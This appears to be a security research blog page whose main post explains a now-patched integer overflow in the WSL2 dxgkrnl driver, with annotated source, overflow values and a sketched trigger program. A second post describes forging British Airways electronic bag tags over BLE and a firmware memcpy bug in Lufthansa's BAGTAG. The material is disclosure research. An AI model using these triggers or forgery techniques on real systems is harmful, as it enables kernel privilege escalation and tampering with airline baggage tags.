INSIGHTS, RESEARCH | September 11, 2020

WSL 2.0 dxgkrnl Driver Memory Corruption

The year 2020 has been a disaster of biblical proportions. Old Testament, real wrath of God type stuff. Fire and brimstone coming down from the skies! Rivers and seas boiling! Forty years of darkness, earthquakes, volcanoes, the dead rising from the grave! Human sacrifices, dogs and cats living together…mass hysteria and reporting Linux kernel bugs to Microsoft!? I thought I would write up a quick blog post explaining the following tweet and walk through a memory corruption flaw reported to MSRC that was recently fixed.

Back in May, before Alex Ionescu briefly disappeared from the Twitter-verse and caused a reactionary slew of conspiracy theories, he sent out this tweet calling out the dxgkrnl driver. That evening it was brought to my attention by my buddy Ilja van Sprundel. Ilja has done a lot of driver research over the years, some of it involving Windows kernel graphics drivers. The announcement of dxgkrnl was exciting and piqued our interest in the new attack surface it opens up, so we decided to quickly dive in and race to find bugs. When examining kernel drivers, the first place I head is the IOCTL (Input/Output Control) handlers. IOCTL handlers allow users to communicate with the driver via the ioctl syscall. This is a prime attack surface because the driver handles userland-provided data within kernel space.
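To make that concrete, interacting with these handlers from userland boils down to an open() on the device node followed by ioctl() calls against it. Below is a minimal sketch; note that the /dev/dxg node path and the request value are assumptions for illustration, not values taken from the driver source.

#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

int main(void)
{
    /* Assumed device node for the dxgkrnl interface under WSL2. */
    int fd = open("/dev/dxg", O_RDWR);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    char args[64] = { 0 };              /* argument block for the handler */
    unsigned long request = 0x1;        /* placeholder request value      */
    int ret = ioctl(fd, request, args); /* lands in the LX_DX* dispatch   */
    printf("ioctl returned %d\n", ret);

    close(fd);
    return 0;
}

Looking into drivers/gpu/dxgkrnl/ioctl.c, the following function sits at the bottom of the file and gives us the full list of IOCTL handlers we want to analyze.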

void ioctl_desc_init(void)
{
    memset(ioctls, 0, sizeof(ioctls));
    SET_IOCTL(/*0x1 */ dxgk_open_adapter_from_luid,
          LX_DXOPENADAPTERFROMLUID);
    SET_IOCTL(/*0x2 */ dxgk_create_device,
          LX_DXCREATEDEVICE);
    SET_IOCTL(/*0x3 */ dxgk_create_context,
          LX_DXCREATECONTEXT);
    SET_IOCTL(/*0x4 */ dxgk_create_context_virtual,
          LX_DXCREATECONTEXTVIRTUAL);
    SET_IOCTL(/*0x5 */ dxgk_destroy_context,
          LX_DXDESTROYCONTEXT);
    SET_IOCTL(/*0x6 */ dxgk_create_allocation,
          LX_DXCREATEALLOCATION);
    SET_IOCTL(/*0x7 */ dxgk_create_paging_queue,
          LX_DXCREATEPAGINGQUEUE);
    SET_IOCTL(/*0x8 */ dxgk_reserve_gpu_va,
          LX_DXRESERVEGPUVIRTUALADDRESS);
    SET_IOCTL(/*0x9 */ dxgk_query_adapter_info,
          LX_DXQUERYADAPTERINFO);
    SET_IOCTL(/*0xa */ dxgk_query_vidmem_info,
          LX_DXQUERYVIDEOMEMORYINFO);
    SET_IOCTL(/*0xb */ dxgk_make_resident,
          LX_DXMAKERESIDENT);
    SET_IOCTL(/*0xc */ dxgk_map_gpu_va,
          LX_DXMAPGPUVIRTUALADDRESS);
    SET_IOCTL(/*0xd */ dxgk_escape,
          LX_DXESCAPE);
    SET_IOCTL(/*0xe */ dxgk_get_device_state,
          LX_DXGETDEVICESTATE);
    SET_IOCTL(/*0xf */ dxgk_submit_command,
          LX_DXSUBMITCOMMAND);
    SET_IOCTL(/*0x10 */ dxgk_create_sync_object,
          LX_DXCREATESYNCHRONIZATIONOBJECT);
    SET_IOCTL(/*0x11 */ dxgk_signal_sync_object,
          LX_DXSIGNALSYNCHRONIZATIONOBJECT);
    SET_IOCTL(/*0x12 */ dxgk_wait_sync_object,
          LX_DXWAITFORSYNCHRONIZATIONOBJECT);
    SET_IOCTL(/*0x13 */ dxgk_destroy_allocation,
          LX_DXDESTROYALLOCATION2);
    SET_IOCTL(/*0x14 */ dxgk_enum_adapters,
          LX_DXENUMADAPTERS2);
    SET_IOCTL(/*0x15 */ dxgk_close_adapter,
          LX_DXCLOSEADAPTER);
    SET_IOCTL(/*0x16 */ dxgk_change_vidmem_reservation,
          LX_DXCHANGEVIDEOMEMORYRESERVATION);
    SET_IOCTL(/*0x17 */ dxgk_create_hwcontext,
          LX_DXCREATEHWCONTEXT);
    SET_IOCTL(/*0x18 */ dxgk_create_hwqueue,
          LX_DXCREATEHWQUEUE);
    SET_IOCTL(/*0x19 */ dxgk_destroy_device,
          LX_DXDESTROYDEVICE);
    SET_IOCTL(/*0x1a */ dxgk_destroy_hwcontext,
          LX_DXDESTROYHWCONTEXT);
    SET_IOCTL(/*0x1b */ dxgk_destroy_hwqueue,
          LX_DXDESTROYHWQUEUE);
    SET_IOCTL(/*0x1c */ dxgk_destroy_paging_queue,
          LX_DXDESTROYPAGINGQUEUE);
    SET_IOCTL(/*0x1d */ dxgk_destroy_sync_object,
          LX_DXDESTROYSYNCHRONIZATIONOBJECT);
    SET_IOCTL(/*0x1e */ dxgk_evict,
          LX_DXEVICT);
    SET_IOCTL(/*0x1f */ dxgk_flush_heap_transitions,
          LX_DXFLUSHHEAPTRANSITIONS);
    SET_IOCTL(/*0x20 */ dxgk_free_gpu_va,
          LX_DXFREEGPUVIRTUALADDRESS);
    SET_IOCTL(/*0x21 */ dxgk_get_context_process_scheduling_priority,
          LX_DXGETCONTEXTINPROCESSSCHEDULINGPRIORITY);
    SET_IOCTL(/*0x22 */ dxgk_get_context_scheduling_priority,
          LX_DXGETCONTEXTSCHEDULINGPRIORITY);
    SET_IOCTL(/*0x23 */ dxgk_get_shared_resource_adapter_luid,
          LX_DXGETSHAREDRESOURCEADAPTERLUID);
    SET_IOCTL(/*0x24 */ dxgk_invalidate_cache,
          LX_DXINVALIDATECACHE);
    SET_IOCTL(/*0x25 */ dxgk_lock2,
          LX_DXLOCK2);
    SET_IOCTL(/*0x26 */ dxgk_mark_device_as_error,
          LX_DXMARKDEVICEASERROR);
    SET_IOCTL(/*0x27 */ dxgk_offer_allocations,
          LX_DXOFFERALLOCATIONS);
    SET_IOCTL(/*0x28 */ dxgk_open_resource,
          LX_DXOPENRESOURCE);
    SET_IOCTL(/*0x29 */ dxgk_open_sync_object,
          LX_DXOPENSYNCHRONIZATIONOBJECT);
    SET_IOCTL(/*0x2a */ dxgk_query_alloc_residency,
          LX_DXQUERYALLOCATIONRESIDENCY);
    SET_IOCTL(/*0x2b */ dxgk_query_resource_info,
          LX_DXQUERYRESOURCEINFO);
    SET_IOCTL(/*0x2c */ dxgk_reclaim_allocations,
          LX_DXRECLAIMALLOCATIONS2);
    SET_IOCTL(/*0x2d */ dxgk_render,
          LX_DXRENDER);
    SET_IOCTL(/*0x2e */ dxgk_set_allocation_priority,
          LX_DXSETALLOCATIONPRIORITY);
    SET_IOCTL(/*0x2f */ dxgk_set_context_process_scheduling_priority,
          LX_DXSETCONTEXTINPROCESSSCHEDULINGPRIORITY);
    SET_IOCTL(/*0x30 */ dxgk_set_context_scheduling_priority,
          LX_DXSETCONTEXTSCHEDULINGPRIORITY);
    SET_IOCTL(/*0x31 */ dxgk_signal_sync_object_cpu,
          LX_DXSIGNALSYNCHRONIZATIONOBJECTFROMCPU);
    SET_IOCTL(/*0x32 */ dxgk_signal_sync_object_gpu,
          LX_DXSIGNALSYNCHRONIZATIONOBJECTFROMGPU);
    SET_IOCTL(/*0x33 */ dxgk_signal_sync_object_gpu2,
          LX_DXSIGNALSYNCHRONIZATIONOBJECTFROMGPU2);
    SET_IOCTL(/*0x34 */ dxgk_submit_command_to_hwqueue,
          LX_DXSUBMITCOMMANDTOHWQUEUE);
    SET_IOCTL(/*0x35 */ dxgk_submit_wait_to_hwqueue,
          LX_DXSUBMITWAITFORSYNCOBJECTSTOHWQUEUE);
    SET_IOCTL(/*0x36 */ dxgk_submit_signal_to_hwqueue,
          LX_DXSUBMITSIGNALSYNCOBJECTSTOHWQUEUE);
    SET_IOCTL(/*0x37 */ dxgk_unlock2,
          LX_DXUNLOCK2);
    SET_IOCTL(/*0x38 */ dxgk_update_alloc_property,
          LX_DXUPDATEALLOCPROPERTY);
    SET_IOCTL(/*0x39 */ dxgk_update_gpu_va,
          LX_DXUPDATEGPUVIRTUALADDRESS);
    SET_IOCTL(/*0x3a */ dxgk_wait_sync_object_cpu,
          LX_DXWAITFORSYNCHRONIZATIONOBJECTFROMCPU);
    SET_IOCTL(/*0x3b */ dxgk_wait_sync_object_gpu,
          LX_DXWAITFORSYNCHRONIZATIONOBJECTFROMGPU);
    SET_IOCTL(/*0x3c */ dxgk_get_allocation_priority,
          LX_DXGETALLOCATIONPRIORITY);
    SET_IOCTL(/*0x3d */ dxgk_query_clock_calibration,
          LX_DXQUERYCLOCKCALIBRATION);
    SET_IOCTL(/*0x3e */ dxgk_enum_adapters3,
          LX_DXENUMADAPTERS3);
    SET_IOCTL(/*0x3f */ dxgk_share_objects,
          LX_DXSHAREOBJECTS);
    SET_IOCTL(/*0x40 */ dxgk_open_sync_object_nt,
          LX_DXOPENSYNCOBJECTFROMNTHANDLE2);
    SET_IOCTL(/*0x41 */ dxgk_query_resource_info_nt,
          LX_DXQUERYRESOURCEINFOFROMNTHANDLE);
    SET_IOCTL(/*0x42 */ dxgk_open_resource_nt,
          LX_DXOPENRESOURCEFROMNTHANDLE);
}

When working through this list of functions, I eventually stumbled onto dxgk_signal_sync_object_cpu, which raises immediate red flags. We can see that data is copied from userland into kernel space via dxg_copy_from_user() in the form of a d3dkmt_signalsynchronizationobjectfromcpu structure, and that this data is then passed as various arguments to dxgvmb_send_signal_sync_object().

struct d3dkmt_signalsynchronizationobjectfromcpu {
    d3dkmt_handle device;
    uint object_count;
    d3dkmt_handle *objects;
    uint64_t  *fence_values;
    struct d3dddicb_signalflags flags;
};

static int dxgk_signal_sync_object_cpu(struct dxgprocess *process,
                       void *__user inargs)
{
    struct d3dkmt_signalsynchronizationobjectfromcpu args;
    struct dxgdevice *device = NULL;
    struct dxgadapter *adapter = NULL;
    int ret = 0;

    TRACE_FUNC_ENTER(__func__);

    ret = dxg_copy_from_user(&args, inargs, sizeof(args));  // User controlled data copied into args
    if (ret)
        goto cleanup;

    device = dxgprocess_device_by_handle(process, args.device);
    if (device == NULL) {
        ret = STATUS_INVALID_PARAMETER;
        goto cleanup;
    }

    adapter = device->adapter;
    ret = dxgadapter_acquire_lock_shared(adapter);
    if (ret) {
        adapter = NULL;
        goto cleanup;
    }

    ret = dxgvmb_send_signal_sync_object(process, &adapter->channel,    // User-controlled data passed as arguments;
                         args.flags, 0, 0,                              // of specific interest: args.object_count
                         args.object_count, args.objects, 0,
                         NULL, args.object_count,
                         args.fence_values, NULL,
                         args.device);

cleanup:

    if (adapter)
        dxgadapter_release_lock_shared(adapter);
    if (device)
        dxgdevice_release_reference(device);

    TRACE_FUNC_EXIT(__func__, ret);
    return ret;
}

The IOCTL handler dxgk_signal_sync_object_cpu lacks input validation of user-controlled data. The user passes a d3dkmt_signalsynchronizationobjectfromcpu structure, which contains a uint value for object_count. Moving deeper into dxgvmb_send_signal_sync_object (drivers/gpu/dxgkrnl/dxgvmbus.c), we know that at this point we control the following arguments, and there has been zero validation:

  • args.flags (flags)
  • args.object_count (object_count, fence_count)
  • args.objects (objects)
  • args.fence_values (fences)
  • args.device (device)

An interesting note is that args.object_count is used for both the object_count and fence_count parameters. Generally a count is used to calculate a length, so it's important to keep an eye out for counts that you control. You're about to witness some extremely trivial bugs. If you're inexperienced at auditing C code for vulnerabilities, see how many issues you can spot before reading the explanations below.

 1  int dxgvmb_send_signal_sync_object(struct dxgprocess *process,
 2                     struct dxgvmbuschannel *channel,
 3                     struct d3dddicb_signalflags flags,
 4                     uint64_t legacy_fence_value,
 5                     d3dkmt_handle context,
 6                     uint object_count,
 7                     d3dkmt_handle __user *objects,
 8                     uint context_count,
 9                     d3dkmt_handle __user *contexts,
10                     uint fence_count,
11                     uint64_t __user *fences,
12                     struct eventfd_ctx *cpu_event_handle,
13                     d3dkmt_handle device)
14  {
15      int ret = 0;
16      struct dxgkvmb_command_signalsyncobject *command = NULL;
17      uint object_size = object_count * sizeof(d3dkmt_handle);
18      uint context_size = context_count * sizeof(d3dkmt_handle);
19      uint fence_size = fences ? fence_count * sizeof(uint64_t) : 0;
20      uint8_t *current_pos;
21      uint cmd_size = sizeof(struct dxgkvmb_command_signalsyncobject) +
22          object_size + context_size + fence_size;
23
24      if (context)
25          cmd_size += sizeof(d3dkmt_handle);
26
27      command = dxgmem_alloc(process, DXGMEM_VMBUS, cmd_size);
28      if (command == NULL) {
29          ret = STATUS_NO_MEMORY;
30          goto cleanup;
31      }
32
33      command_vgpu_to_host_init2(&command->hdr,
34                     DXGK_VMBCOMMAND_SIGNALSYNCOBJECT,
35                     process->host_handle);
36
37      if (flags.enqueue_cpu_event)
38          command->cpu_event_handle = (winhandle) cpu_event_handle;
39      else
40          command->device = device;
41      command->flags = flags;
42      command->fence_value = legacy_fence_value;
43      command->object_count = object_count;
44      command->context_count = context_count;
45      current_pos = (uint8_t *) &command[1];
46      ret = dxg_copy_from_user(current_pos, objects, object_size);
47      if (ret) {
48          pr_err("Failed to read objects %p %d",
49                 objects, object_size);
50          goto cleanup;
51      }
52      current_pos += object_size;
53      if (context) {
54          command->context_count++;
55          *(d3dkmt_handle *) current_pos = context;
56          current_pos += sizeof(d3dkmt_handle);
57      }
58      if (context_size) {
59          ret = dxg_copy_from_user(current_pos, contexts, context_size);
60          if (ret) {
61              pr_err("Failed to read contexts %p %d",
62                     contexts, context_size);
63              goto cleanup;
64          }
65          current_pos += context_size;
66      }
67      if (fence_size) {
68          ret = dxg_copy_from_user(current_pos, fences, fence_size);
69          if (ret) {
70              pr_err("Failed to read fences %p %d",
71                     fences, fence_size);
72              goto cleanup;
73          }
74      }
75
76      ret = dxgvmb_send_sync_msg_ntstatus(channel, command, cmd_size);
77
78  cleanup:
79      if (command)
80          dxgmem_free(process, DXGMEM_VMBUS, command);
81      TRACE_FUNC_EXIT_ERR(__func__, ret);
82      return ret;
83  }

This count that we control is used, without any validation, in multiple locations throughout the IOCTL for buffer length calculations. This leads to multiple integer overflows, followed by an allocation that is too short, which in turn causes memory corruption.

Integer overflows:

17) Our controlled value object_count is used to calculate object_size.

19) Our controlled value fence_count is used to calculate fence_size.

21) The final cmd_size is calculated from the previous object_size and fence_size values.

25) cmd_size can also overflow simply from adding sizeof(d3dkmt_handle) if it is already large enough.
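To make the arithmetic concrete, here is a standalone sketch of the same 32-bit size calculations using a value an attacker is free to choose (the header size is illustrative; the real sizeof(struct dxgkvmb_command_signalsyncobject) differs, and we assume the driver's d3dkmt_handle is the usual 32-bit handle):

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    /* Attacker-chosen count from the ioctl argument block. */
    uint32_t object_count = 0x2AAAAAAB;

    /* Same math as lines 17-21, with 32-bit (uint) arithmetic:
     * sizeof(d3dkmt_handle) == 4 and sizeof(uint64_t) == 8. */
    uint32_t object_size = object_count * 4;   /* 0xAAAAAAAC - still huge */
    uint32_t fence_size  = object_count * 8;   /* wraps to 0x55555558     */

    uint32_t hdr = 0x48;                       /* illustrative header size */
    uint32_t cmd_size = hdr + object_size + fence_size; /* wraps to hdr+4  */

    printf("object_size = 0x%08x\n", object_size);
    printf("fence_size  = 0x%08x\n", fence_size);
    printf("cmd_size    = 0x%08x\n", cmd_size);
    return 0;
}

With these values, the allocation at line 27 is only a few bytes larger than the header, while the copies at lines 46 and 68 still use the enormous object_size and fence_size.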

Memory corruption:

27) The resulting cmd_size is ultimately used as the allocation length for dxgmem_alloc. As an attacker, we can force this value to be very small.

Since the newly allocated command buffer can be extremely small, the writes that follow can land outside of it and corrupt memory.

33-44) These lines all write data into the freshly allocated buffer, and depending on the size we forced, there is no guarantee the buffer has space for the data.

46, 68) Eventually execution reaches two calls to dxg_copy_from_user. In both cases, user-controlled data is copied in using the original, extremely large size values (remember, our object_count was used to calculate both object_size and fence_size).
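Putting it all together, a trigger would be shaped like the sketch below. This is an illustration rather than a working exploit: the device node, the encoded ioctl request value, and the device handle are placeholders (the real handle comes from earlier LX_DXCREATEDEVICE calls), and the handle/flags field widths are assumptions.

#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

/* Userland mirror of the driver structure; field widths assumed. */
struct d3dkmt_signalsynchronizationobjectfromcpu {
    uint32_t  device;        /* d3dkmt_handle from a prior create_device */
    uint32_t  object_count;
    uint32_t *objects;       /* d3dkmt_handle array */
    uint64_t *fence_values;
    uint32_t  flags;         /* d3dddicb_signalflags */
};

int main(void)
{
    int fd = open("/dev/dxg", O_RDWR);  /* assumed device node */
    if (fd < 0)
        return 1;

    static uint32_t objects[16];
    static uint64_t fences[16];

    struct d3dkmt_signalsynchronizationobjectfromcpu args = { 0 };
    args.device       = 0x40000001;   /* placeholder valid device handle */
    args.object_count = 0x2AAAAAAB;   /* wraps cmd_size as shown above   */
    args.objects      = objects;
    args.fence_values = fences;

    ioctl(fd, 0x31, &args);           /* 0x31 is the handler index; the
                                         encoded request value is assumed */
    close(fd);
    return 0;
}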

Hopefully this inspires you to take a peek at other open-source drivers and hunt down security bugs. This issue was reported to MSRC on May 20th, 2020 and resolved on August 26th, 2020, receiving a severity of Important with an impact of Elevation of Privilege.

You can view the patch commit here with the newly added validation.

INSIGHTS, RESEARCH | September 1, 2020

Breaking Electronic Baggage Tags – Lufthansa vs British Airways

If you are reading this article, I will venture to guess that you have already had the ‘pleasure’ of queuing to check a bag at an airport. To improve the bag-check procedure, Electronic Baggage Tag (EBT) solutions are being introduced to the market that leverage the new technologies most travellers have access to nowadays.

This time I will take a look at the security posture of two of the most prominent EBT solutions: British Airways’ TAG and Lufthansa’s BAGTAG.

First of all, IATA provides an implementation guide for these devices, which I recommend you read before continuing on with this blog post, as well as the IATA resolution 753 on baggage tracking.

Certain parts of the implementation guide are worth noting:

In general terms, an EBT solution is comprised of:

  • Airline mobile app
  • Airline backend
  • EBT device
    • NFC
    • BLE
    • Display (e-INK)

The communication channel between the airline mobile app and the EBT is established through a BLE interface.

Now let's see how closely the actual functionality of these EBT solutions matches the IATA security requirements.

British Airways’ TAG

British Airways’ (BA’s) TAG is provided by ViewTag. As usual, by looking at the FCCID website, we can find a teardown of the device.

The differences between the teardown version and the one being commercialized are not significant.

It is as simple as it looks. The Nordic SoC is in charge of BLE communication with the mobile app. By reverse engineering the BA app, it was easy to figure out how the solution works: basically, the BA app directly transfers, via BLE, the data that will be used to update the EBT display, without any additional security.

A custom payload written to the ‘PASS_DATA’ characteristic is the mechanism used to transfer the boarding pass/bag tag data that will eventually be rendered on the EBT device’s e-INK display. The device validates neither the authenticity nor the integrity of the data being transferred. The following code receives the booking information collected from the BA backend and generates the payload:

The payload is a string in which the following items are concatenated in a specific order (a sketch of this assembly follows the list):

  • passengerName
  • bookingReference
  • priority
  • sequenceNumber
  • destinationFlightNum
  • destinationFlightDate (ddHHmm)
  • destinationAirport
  • destinationName
  • firstTransferFlightNum
  • firstTransferFlightDate
  • firstTransferAirport
  • secondTransferFlightNum
  • secondTransferFlightDate
  • secondTransferAirport
  • departureAirport
  • euDeparture (enable green bars)
  • fullIdentifier
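As an illustration of how little stands between an attacker and a valid-looking tag, assembling the payload is plain string concatenation. The field order below follows the list above, but the separator and the sample values are assumptions for demonstration; the exact wire format is simply whatever the app writes to PASS_DATA.

#include <stdio.h>

int main(void)
{
    char payload[512];

    /* Hypothetical delimiter ("|"); the real format may differ. */
    snprintf(payload, sizeof(payload),
             "%s|%s|%s|%s|%s|%s|%s|%s",
             "DOE/JOHN",   /* passengerName         */
             "ABC123",     /* bookingReference      */
             "1",          /* priority              */
             "0042",       /* sequenceNumber        */
             "BA0117",     /* destinationFlightNum  */
             "241030",     /* destinationFlightDate */
             "JFK",        /* destinationAirport    */
             "NEW YORK");  /* destinationName       */
    /* ...the remaining fields (transfer legs, departureAirport,
     * euDeparture, fullIdentifier) are appended the same way, and the
     * resulting string is written to the PASS_DATA characteristic. */

    puts(payload);
    return 0;
}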

That’s it, not very interesting I know…

The above diagram sums up the overall implementation:

  1. The BA app downloads the passenger’s booking info and checks eligibility to generate a digital bag tag (only available to Executive Club members).
  2. The BA app generates the bag tag payload and transfers it through the PASS_DATA characteristic.
  3. The EBT processes this payload and updates the e-INK display with the received information.

As a result of this design, anyone, not only the airline, is able to forge arbitrary bag tags and update the EBT device without any further interaction with BA. Obviously, you still require physical access to the EBT device to press the button that enables the BLE functionality.

The following proof-of-concept can be used to forge arbitrary bag tags and render them on a BA TAG.

File: poc.py

The following is a custom bag tag generated using this PoC:

Lufthansa’s BAGTAG

Lufthansa decided to go with DSTAGS, a company founded by an NXP employee, which created BAGTAG. I think this detail is worth mentioning because my analysis revealed that the team behind the device seems to have significant experience with NXP components, although from a security perspective they missed some basic things.

As with the TAG solution, we can access a device teardown on the FCCID site, which is almost identical to the units used during the analysis.

The main components are:

  • Nordic NRF8001 – BLE SoC
  • NXP LPC115F – MCU
  • NXP 7001C – Secure Element

As the following image shows, the Serial Wire Debug (SWD) headers were easily accessible, so that was the first thing to check.

Fortunately, the BAGTAG production units are commercialized without enforcing any type of Code Read Protection (CRP) scheme on their MCUs. As a result, it was possible to gain complete access to the firmware, as well as to flash a new one (I used a PEmicro Multilink working with the gdb server built into NXP’s MCUXpresso).

After reverse engineering the firmware (bare metal, no symbols, no strings) and the app, it was clear that this solution was much more complex and solid than BA’s. Basically, the BAGTAG solution implements a chip-to-cloud scheme using the NDA-protected NXP 7001C Secure Element, which contains the cryptographic materials required both to uniquely identify the EBT and to decrypt the responses received from the BAGTAG backend. The MCU communicates with the Lufthansa app through the NRF8001 BLE transceiver.

I came up with the following diagram to help elaborate the main points of interest.

  1. The Lufthansa app downloads the passenger’s booking info and checks whether the user wants to generate an EBT.
  2. The BAGTAG’s BLE service exposes two characteristics (receiveGUID and transmitGUID) that are basically used to transfer data between the app and the device.

Actually, the important data comes encrypted directly from the BAGTAG cloud. In addition to the passthrough channel, there are two publicly supported commands:

The startSessionRequest command returns an internal 59-byte ‘ID’ that identifies that specific BAGTAG device. This ID is stored inside the NXP 7001C Secure Element, which communicates with the MCU via I2C using an ISO-7816-compliant protocol.

There are two commands invoked in the firmware for the selected applet (a sketch of the framing follows the list):

  • 0x8036: Returns the Session ID and uCode (to generate the IATA’s GUID)
  • 0x8022: Decrypt data (received from the BAGTAG backend through the BLE passthrough)
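For context, a rough sketch of what driving the applet from the MCU side could look like is shown below. Interpreting 0x8036 as an ISO-7816-4 style APDU with CLA=0x80/INS=0x36 is an assumption, and i2c_write()/i2c_read() are placeholders for the firmware's actual bus primitives; the 7001C's real command encoding is NDA-protected.

#include <stdint.h>
#include <stddef.h>

/* Placeholder I2C primitives standing in for the firmware's driver. */
extern int i2c_write(uint8_t addr, const uint8_t *buf, size_t len);
extern int i2c_read(uint8_t addr, uint8_t *buf, size_t len);

#define SE_I2C_ADDR 0x48  /* assumed 7-bit address of the 7001C */

/* Request the Session ID and uCode (command 0x8036). */
int se_get_session_id(uint8_t *out, size_t out_len)
{
    const uint8_t apdu[] = {
        0x80,   /* CLA: proprietary class (assumed) */
        0x36,   /* INS: session ID / uCode          */
        0x00,   /* P1                               */
        0x00,   /* P2                               */
        0x00,   /* Le: expect the full response     */
    };

    if (i2c_write(SE_I2C_ADDR, apdu, sizeof(apdu)) != 0)
        return -1;

    /* Response: the 59-byte ID followed by SW1/SW2 status words. */
    return i2c_read(SE_I2C_ADDR, out, out_len);
}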

  3. The user needs to register the BAGTAG device and create an account. Then the app serializes the booking info required to generate a valid BAGTAG (pretty much the same fields that were mentioned for BA’s solution) and submits it to the BAGTAG backend to be validated. If everything is correct, the BAGTAG backend returns an encrypted blob that goes through the BLE passthrough channel directly to the BAGTAG device.
  4. The MCU receives this encrypted blob and sends it to the 7001C Secure Element to be decrypted. The decrypted data received from the 7001C via I2C is then processed, eventually updating the e-INK display with this information.

It is worth mentioning that I didn’t perform any live tests on the Internet-facing servers to avoid any unexpected behaviors in the production environments.

At the intra-board communication level, the MCU does not implement a secure channel to talk to the NXP 7001C Secure Element. As a result, a malicious component on the I2C bus could provide arbitrary content that will eventually be rendered, as the MCU has no way of validating whether it came from the actual 7001C. Obviously, malicious firmware running in the BAGTAG device may perform the same actions without requiring an external component.

Intra-board attacks (SPI, I2C, etc.) are really interesting in scenarios where the MCU offloads specific functionality (network, crypto, radio, etc.) to another SoC. If you are into this kind of attack, stay tuned 😉

For instance, we can see how this lack of intra-board security can also lead to a memory corruption vulnerability in this firmware:

See the issue?

At line 58, ‘transfer_to_i2c’ expects to read v12+2 bytes from the I2C slave, storing them at 0x100011A4. Then at line 63, a byte that may be controlled by an attacker is used to calculate the number of bytes that will be copied in the memcpy operation. If that byte is 0x00, we face a wild memcpy corruption scenario.
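The decompiled listing is not reproduced here, but the pattern described above reconstructs to something like the following sketch. All names, offsets, and buffer sizes are my reconstruction from the decompiler output, not the literal firmware code:

#include <stdint.h>
#include <string.h>

/* Placeholder for the firmware routine that reads len bytes from the
 * I2C slave into dst. */
extern int transfer_to_i2c(uint8_t *dst, uint32_t len);

static uint8_t i2c_buf[0x20];   /* fixed buffer (0x100011A4 in SRAM) */
static uint8_t out_buf[0x20];

void handle_se_response(uint8_t v12)
{
    /* Line 58 equivalent: read v12 + 2 bytes from the I2C slave. */
    transfer_to_i2c(i2c_buf, (uint32_t)v12 + 2);

    /* Line 63 equivalent: a length byte from the slave's response is
     * trusted. If an attacker on the bus supplies 0x00, the unsigned
     * subtraction wraps to 0xFFFFFFFE and the memcpy runs wild. */
    uint32_t copy_len = (uint32_t)i2c_buf[1] - 2;
    memcpy(out_buf, &i2c_buf[2], copy_len);
}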

Conclusions

Lufthansa and British Airways were notified of these issues. Both consider them low-risk threats.

British Airways

“Through our own internal investigations we have validated that there are enough checks in the background that take place to ensure an unauthorised bag would not make it through.

The potential exploitation scenarios are overall really unlikely. The overall risk to the businesses is also considered to be low severity.”

Lufthansa

“From a security standpoint appropriate screening of hold baggage remains by far the most important pillar.

In addition the baggage handling process is robust against many forms of manipulation.

The manipulation by means of EBT is therefore only a supplement to already considered cases and does not mean a significant increase of the attack surface.

In this respect, there is only a small additional probability of occurrence.

A piece of luggage manipulated via Bluetooth would be identified and transferred to a verification process.

This ensures that no luggage manipulated in this way can get on board of one of our aircrafts.

Lufthansa thanks the researcher for his cooperation.

We will gladly follow up such indications, among other things by means of our BugBounty program.”

I agree there are serious limitations to turning these issues into a practical attack scenario; however, time will tell how these technologies evolve. Hopefully this kind of research will help close any security gaps before a more significant attack vector can be discovered.

References

  1. https://www.iata.org/en/publications/ebt-guide/
  2. https://www.iata.org/en/programs/ops-infra/baggage/baggage-tracking/
  3. https://viewtag.com/
  4. https://fccid.io/NOI-VGIDEBT/Internal-Photos/Internal-photos-4145161
  5. https://fccid.io/2AK3S-BAGTAG/Internal-Photos/Internal-photographs-3391010
  6. https://www.nxp.com/docs/en/data-sheet/LPC111X.pdf
  7. http://www.pemicro.com/products/product_viewDetails.cfm?product_id=15320168&productTab=1
  8. https://www.nxp.com/design/software/development-software/mcuxpresso-software-and-tools-/mcuxpresso-integrated-development-environment-ide:MCUXpresso-IDE

INSIGHTS | October 17, 2018

Smart Cities: Cybersecurity Worries

An infodocument providing a visual exploration of the growing security concerns around smart city technologies, featuring detail on the myriad technologies, problems, threats, and possible targets, as well as current examples of cities that have experienced attacks.

INSIGHTS | October 23, 2017

Embedding Defense in Server-side Applications

Applications always contain security flaws, which is why we rely on multiple layers of defense. Even so, applications are still struggling with their defenses despite exhaustive testing and layered protections. Perhaps we should rethink our approach to application defense, with the goal of introducing defensive methods that cause attackers to cease, or that induce them to take incorrect actions based on false premises.


There are a variety of products that provide valuable resources when basic, off-the-shelf protection is required or the application source code is not available. However, implementations in native code provide a greater degree of defense that cannot be achieved using third-party solutions. This document aims to:
  • Enumerate a comprehensive list of current and new defensive techniques.
    Multiple defensive techniques have been disclosed in books, papers and tools. This specification collects those techniques and presents new defensive options to fill the opportunity gap that remains open to attackers.


  • Enumerate methods to identify attack tools before they can access functionalities.
    The tools used by attackers identify themselves in several ways. Multiple features of a request can disclose that it is not from a normal user; a tool may abuse security flaws in ways that can help to detect the type of tool an attacker is using, and developers can prepare diversions and traps in advance that the specific tool would trigger automatically.


  • Disclose how to detect attacker techniques within code.
    Certain techniques can identify attacks within the code. Developers may know in advance that certain conditions will only be triggered by attackers, and they can also be prepared for certain unexpected scenarios.


  • Provide a new defensive approach.
    Server-side defense is normally about blocking malicious IP addresses associated with attackers; however, an attacker’s focus can be diverted or modified. Sometimes certain functionalities may be presented to attackers only to better prosecute them if those functionalities are triggered.


  • Provide these protections for multiple programming languages.
    This document will use pseudo code to explain functionalities that can reduce the effectiveness of attackers and expose their actions, and working proof-of-concept code will be released for four programming languages: Java, Python, .NET, and PHP. (A minimal illustrative sketch follows this list.)
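To give a flavor of what these embedded checks look like in practice, here is a minimal trap sketch. It is written in C for brevity and is purely illustrative (the released proof-of-concept code targets Java, Python, .NET, and PHP); the decoy parameter name and the detection policy are hypothetical, not taken from the specification.

#include <stdio.h>
#include <string.h>

/* Trap: advertise a decoy parameter (e.g. in an HTML comment or
 * robots.txt) that no legitimate client ever sends. Automated attack
 * tools that harvest and replay every discovered parameter will
 * trigger it. */
static int is_attack_probe(const char *query_string)
{
    return query_string && strstr(query_string, "debug_token=") != NULL;
}

int main(void)
{
    const char *normal  = "user=alice&page=2";
    const char *scanner = "user=alice&page=2&debug_token=x";

    printf("%d\n", is_attack_probe(normal));   /* 0: likely a real user */
    printf("%d\n", is_attack_probe(scanner));  /* 1: divert, log, trap  */
    return 0;
}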

